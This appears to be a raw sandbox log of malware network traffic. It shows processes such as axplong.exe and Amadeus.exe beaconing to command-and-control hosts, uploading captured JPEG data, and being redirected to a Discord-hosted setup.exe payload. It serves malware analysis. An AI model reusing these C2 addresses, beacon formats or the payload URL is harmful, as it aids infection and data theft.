Aug 31, 2024 15:44:54.292506933 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 15:44:54.292507887 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 15:44:54.292598963 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 15:44:54.292656898 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 15:44:54.292656898 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 15:44:56.082376957 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49746	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:55.137120962 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:44:55.820595026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:44:55.832396984 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:44:56.085450888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49747	194.58.114.223	80	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:55.560604095 CEST	48	OUT	GET /d/385107 HTTP/1.1 Host: 194.58.114.223
Aug 31, 2024 15:44:56.288523912 CEST	1236	IN	HTTP/1.1 302 Found Server: nginx Date: Sat, 31 Aug 2024 13:44:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc& Data Raw: 34 35 36 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 32 37 34 36 33 34 37 31 36 34 35 31 39 36 37 30 36 30 2f 31 32 37 39 33 36 39 39 38 33 36 31 36 34 38 37 35 31 35 2f 73 65 74 75 70 2e 65 78 65 3f 65 78 3d 36 36 64 34 33 31 61 35 26 69 73 3d 36 36 64 32 65 30 32 35 26 68 6d 3d 66 34 31 34 34 32 64 38 30 34 39 35 66 36 61 32 62 37 66 61 34 66 37 30 65 37 65 66 37 33 64 61 38 37 37 36 30 30 38 64 30 38 34 36 65 64 62 30 61 61 63 64 37 36 32 33 63 33 35 33 30 35 66 63 26 27 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 [TRUNCATED] Data Ascii: 456<html> <head> <meta name="referrer" content="no-referrer"> <meta http-equiv="Refresh" content="0; URL='https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc&'"> <script> window.location.href="https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc&"; </script> </head> <body> <a href="https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc&" referrerPolicy="no-referrer" rel="noreferrer">click here</a>
Aug 31, 2024 15:44:56.289092064 CEST	270	IN	Data Raw: 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 Data Ascii: <script> self.location="https://cdn.discordapp.com/attachments/1274634716451967060/1279369983616487515/setup.exe?ex=66d431a5&is=66d2e025&hm=f41442d80495f6a2b7fa4f70e7ef73da8776008d0846edb0aacd7623c35305fc&"; </script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49748	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:56.212642908 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:44:56.957093954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:44:56.969882011 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:44:57.217781067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49750	185.215.113.19	80	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:56.784262896 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTAyMTg= Host: 185.215.113.19 Content-Length: 90370 Cache-Control: no-cache
Aug 31, 2024 15:44:56.784334898 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 41 79 4d 54 67 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTAyMTg=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 15:44:56.784473896 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 15:44:56.784473896 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 15:44:56.784522057 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 15:44:56.784522057 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 15:44:56.784629107 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 15:44:56.784629107 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 15:44:56.784629107 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 15:44:56.784658909 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 15:44:56.784658909 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 15:44:58.228344917 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49751	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:57.407828093 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:44:58.142997026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:44:58.144599915 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:44:58.391535997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49752	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:58.512777090 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:44:59.261246920 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:44:59.356612921 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:44:59.604805946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49753	185.215.113.19	80	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:59.426213026 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODg4NzA= Host: 185.215.113.19 Content-Length: 89022 Cache-Control: no-cache
Aug 31, 2024 15:44:59.426343918 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 67 34 4e 7a 41 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODg4NzA=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 15:44:59.426424026 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 15:44:59.426459074 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 15:44:59.426477909 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 15:44:59.426506042 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 15:44:59.426567078 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 15:44:59.426589012 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 15:44:59.426630974 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 15:44:59.426651001 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 15:44:59.426696062 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 15:45:01.428546906 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49754	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:59.903063059 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:00.644496918 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:00.704093933 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:45:01.162520885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49756	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:01.300790071 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:02.209131956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:02.229897976 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:45:02.475981951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49757	185.215.113.26	80	5976	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:02.292268038 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:03.040201902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:03.145353079 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 45 34 44 43 39 46 45 31 36 41 35 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5E4DC9FE16A5DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Aug 31, 2024 15:45:03.402725935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49758	185.215.113.19	80	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:02.486704111 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTA4NjU= Host: 185.215.113.19 Content-Length: 91017 Cache-Control: no-cache
Aug 31, 2024 15:45:02.486741066 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 41 34 4e 6a 55 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTA4NjU=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 15:45:02.486787081 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 15:45:02.486816883 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 15:45:02.486849070 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 15:45:02.486912012 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 15:45:02.486936092 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 15:45:02.486965895 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 15:45:02.486987114 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 15:45:02.487020969 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 15:45:02.487040997 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 15:45:04.515947104 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:04.941889048 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 32 36 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000262001&unit=246122658369
Aug 31, 2024 15:45:05.304280996 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49759	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:02.800112963 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:03.408668041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
